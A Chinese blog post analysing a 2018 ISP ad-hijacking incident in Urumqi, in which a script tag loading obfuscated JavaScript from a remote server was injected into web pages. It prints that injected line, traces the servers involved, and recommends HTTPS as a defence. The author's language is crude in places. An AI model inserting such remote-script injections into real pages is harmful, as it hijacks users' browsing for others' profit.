登录   注册

对于新疆乌鲁木齐沙依巴克区电信于2018年8月13日产生的网络劫持进行分析

枪文评论 xlch 1个月前 (08-13) 189次浏览 0个评论 扫描二维码

今天,我在开发网页的时候,发现右下角蹦出一个未加载的flash。

我顺手点了一下,可以,大钩子婆娘在线….

我日您妈,老子调试个网页容易吗?调试着还瞎鸡巴蹦跶出一堆广告代码,增加老子工作量。

 

好的,稍安勿躁,大不了明天打电话投诉就是了。

 

现在分析一下这个广告劫持的手段。

F12,可以看到这个flash是通过iframe加载的

接下来刷新网页,看看他是怎么加载的:

可以看出,网页的<head>被劫持,加入了一个js文件。

“<script src=”http://172.81.246.180:11211/t.js?MAC=FC7C0213A38E“></script> ”

那么看看这个js文件有什么用途:

呵,被混淆了。不过我也不打算去解密了,没意义。

猜都能猜到,大概就是用来放置广告代码的。

那么,这个服务器是哪里的:

172.81.246.180

通过XlchIP查询得知,这是一台腾讯云机器:

(呵,这特么劫持的可以。)

直接访问看看,说不定能套出什么东西:

http://172.81.246.180:11211

吔,竟然用的是宝塔面板!!

很棒。

继续查看网络日志,发现还访问了一个页面:

http://172.81.246.180:11211/pc.html

点开看看,呵呵,还加了中国智障统计:

 

原理分析:

劫持网页后在head插入js -> 通过js释放广告 -> 受害者点击后投放者获取收益。

稍有常识的人都能看出,

http://bb.dugesheying.com/static/ssp/yx/188wan.html

其中SSP是一种广告获取利益的方式,相关资料欢迎使用搜索引擎。

这样大范围的劫持,插入广告代码,获得的收入是不菲的。

 

如何避免网站被劫持?

上https吧。

之前绚丽彩虹服务全部上https也是这个原因。中国网络劫持严重,而且监管不力!!

 

得,到此结束。明天打12300投诉去。

 

2018-08-16更新:

 

提交工单腾讯云投诉后,客服答复会进行处理。

之后劫持服务器发生了变更,首先是变成了“43.251.101.207”

使用XlchIP分析所在地为北京,但是无法查询到服务商。

接着这个IP使用301重定向到了另一个ip:“103.49.209.27”

使用XlchIP分析所在地为新加坡,显示服务商为“Rciol国际数据中心”。

(呵呵终于聪明了换成国外服务器了。)

通过浏览器开发者控制台分析,手机端广告商为“有盟移动”

已经向对方反应该问题,但未收到回复。


绚丽彩虹 , 版权所有丨如未注明 , 均为原创丨未经允许,禁止转载
喜欢 (2)
[pay3@xlch8.cn]
分享 (0)

您必须 登录 才能发表评论!